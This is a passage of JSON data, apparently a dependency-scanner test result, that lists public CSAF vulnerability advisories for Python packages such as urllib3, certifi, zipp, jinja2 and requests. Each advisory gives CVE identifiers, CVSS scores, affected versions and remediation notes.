"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"]}], "title": "CVE-2024-37891/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-39689"]}], "cve": "CVE-2024-39689", "cwe": {"id": "345", "name": "Insufficient Verification of Data Authenticity"}, "discovery_date": "2024-07-05T20:06:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-39689"}, {"system_name": "GitHub Advisory", "text": "GHSA-248v-346w-9cwc"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Certifi removes GLOBALTRUST root certificate Certifi 2024.07.04 removes root certificates from \"GLOBALTRUST\" from the root store. These are in the process of being removed from Mozilla's trust store.  GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified \"long-running and unresolved compliance issues\". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI)."}, {"category": "description", "details": "Vulnerability Description", "text": "Certifi removes GLOBALTRUST root certificate"}], "product_status": {"known_affected": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"], "known_not_affected": ["certifi@2024.07.04"]}, "references": [{"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "Google Mailing List", "url": "https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "environmentalScore": 3.1, "environmentalSeverity": "LOW", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 3.1, "temporalSeverity": "LOW", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1"}, "products": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"]}], "title": "CVE-2024-39689/pkg:pypi/certifi@2023.7.22"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-5569"]}], "cve": "CVE-2024-5569", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-07-09T00:31:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-5569"}, {"system_name": "Huntr Advisory", "text": "be898306-11f9-46b4-b28c-f4c4aa4ffbae"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# zipp Denial of Service vulnerability A Denial of Service (DoS) vulnerability exists in the jaraco/zipp library, affecting all versions prior to 3.19.1. The vulnerability is triggered when processing a specially crafted zip file that leads to an infinite loop. This issue also impacts the zipfile module of CPython, as features from the third-party zipp library are later merged into CPython, and the affected code is identical in both projects. The infinite loop can be initiated through the use of functions affecting the `Path` module in both zipp and zipfile, such as `joinpath`, the overloaded division operator, and `iterdir`. Although the infinite loop is not resource exhaustive, it prevents the application from responding. The vulnerability was addressed in version 3.19.1 of jaraco/zipp."}, {"category": "description", "details": "Vulnerability Description", "text": "zipp Denial of Service vulnerability"}], "product_status": {"known_affected": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"], "known_not_affected": ["zipp@3.19.1"]}, "references": [{"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "products": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"]}], "title": "CVE-2024-5569/pkg:pypi/zipp@3.16.2"}]}}, "result_14": {"diff_summary": {"test/csaf_1.json": {"document": {}, "product_tree": {}, "vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-43804"]}], "cve": "CVE-2023-43804", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-02T23:27:05", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-43804"}, {"system_name": "GitHub Advisory", "text": "GHSA-v845-jxx5-vc9f"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-192"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "`Cookie` HTTP header isn't stripped on cross-origin redirects"}, {"category": "details", "details": "Vulnerability Details", "text": "# `Cookie` HTTP header isn't stripped on cross-origin redirects urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly.  Users **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach.  ## Affected usages  We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:  * Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6) * Using the `Cookie` header on requests, which is mostly typical for impersonating a browser. * Not disabling HTTP redirects * Either not using HTTPS or for the origin server to redirect to a malicious origin.  ## Remediation  * Upgrading to at least urllib3 v1.26.17 or v2.0.6 * Disabling HTTP redirects using `redirects=False` when sending requests. * Not using the `Cookie` header.  ## Related CVE(s) CVE-2023-43804, PYSEC-2023-192"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"], "known_not_affected": ["urllib3@2.0.6"]}, "references": [{"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.9, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.9, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"]}], "title": "CVE-2023-43804/pkg:pypi/urllib3@2.0.4"}]}, "test/csaf_2.json": {"document": {}, "product_tree": {}, "vulnerabilities": []}}, "common_summary": {"document": {"aggregate_severity": {"text": "High"}, "category": "csaf_vex", "csaf_version": "2.0", "lang": "en", "notes": [{"category": "legal_disclaimer", "text": "Depscan reachable code only covers the project source code, not the code of dependencies. A dependency may execute vulnerable code when called even if it is not in the project's source code. Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}], "publisher": {"category": "vendor", "contact_details": "vendor@mcvendorson.com", "name": "Vendor McVendorson", "namespace": "https://appthreat.com"}, "title": "Your Title"}, "product_tree": {"full_product_names": [{"name": "tinydb", "product_id": "tinydb:4.8.0", "product_identification_helper": {"purl": "pkg:pypi/tinydb@4.8.0"}}]}, "vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-42969"]}], "cve": "CVE-2022-42969", "cwe": {"id": "1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2022-10-16T12:00:23", "ids": [{"system_name": "CVE Record", "text": "CVE-2022-42969"}, {"system_name": "Pypi Advisory", "text": "py"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "ReDoS in py library when used with subversion "}, {"category": "details", "details": "Vulnerability Details", "text": "# ReDoS in py library when used with subversion  The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled.  The particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context.  ## Related CVE(s) CVE-2022-42969, PYSEC-2022-42969"}], "product_status": {"known_affected": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}, {"summary": "Cve 2022", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "environmentalScore": 7.5, "environmentalSeverity": "HIGH", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 7.5, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}], "title": "CVE-2022-42969/pkg:pypi/py@1.11.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-45803"]}], "cve": "CVE-2023-45803", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-17T20:15:25", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-45803"}, {"system_name": "GitHub Advisory", "text": "GHSA-g4mx-q9vg-27p4"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-212"}, {"system_name": "Rfc-editor Advisory", "text": "rfc9110"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "urllib3's request body not stripped after redirect from 303 status changes request method to GET"}, {"category": "details", "details": "Vulnerability Details", "text": "# urllib3's request body not stripped after redirect from 303 status changes request method to GET urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers.  From [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get):  > A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported.  ## Affected usages  Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable.  Both of the following conditions must be true to be affected by this vulnerability:  * If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) * The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised.  ## Remediation  You can remediate this vulnerability with any of the following steps:  * Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7) * Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`. * Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body.   ## Related CVE(s) CVE-2023-45803, PYSEC-2023-212"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"], "known_not_affected": ["urllib3@2.0.7"]}, "references": [{"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "ADJACENT_NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"]}], "title": "CVE-2023-45803/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-22195"]}], "cve": "CVE-2024-22195", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-01-11T15:20:48", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-22195"}, {"system_name": "GitHub Advisory", "text": "GHSA-h5c8-rqwp-cp95"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}, {"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix."}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}, "references": [{"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}], "title": "CVE-2024-22195/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-34064"]}], "cve": "CVE-2024-34064", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-05-06T14:20:59", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-34064"}, {"system_name": "GitHub Advisory", "text": "GHSA-h75v-3vvj-5mfj"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}, {"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters.  Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe."}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}], "title": "CVE-2024-34064/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-35195"]}], "cve": "CVE-2024-35195", "cwe": {"id": "670", "name": "Always-Incorrect Control Flow Implementation"}, "discovery_date": "2024-05-20T20:15:00", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-35195"}, {"system_name": "GitHub Advisory", "text": "GHSA-9wx4-h78v-vm56"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "Requests `Session` object does not verify requests after making first request with verify=False"}, {"category": "details", "details": "Vulnerability Details", "text": "# Requests `Session` object does not verify requests after making first request with verify=False When making requests through a Requests `Session`, if the first request is made with `verify=False` to disable cert verification, all subsequent requests to the same origin will continue to ignore cert verification regardless of changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool.  ### Remediation Any of these options can be used to remediate the current issue, we highly recommend upgrading as the preferred mitigation.  * Upgrade to `requests>=2.32.0`. * For `requests<2.32.0`, avoid setting `verify=False` for the first request to a host while using a Requests Session. * For `requests<2.32.0`, call `close()` on `Session` objects to clear existing connections if 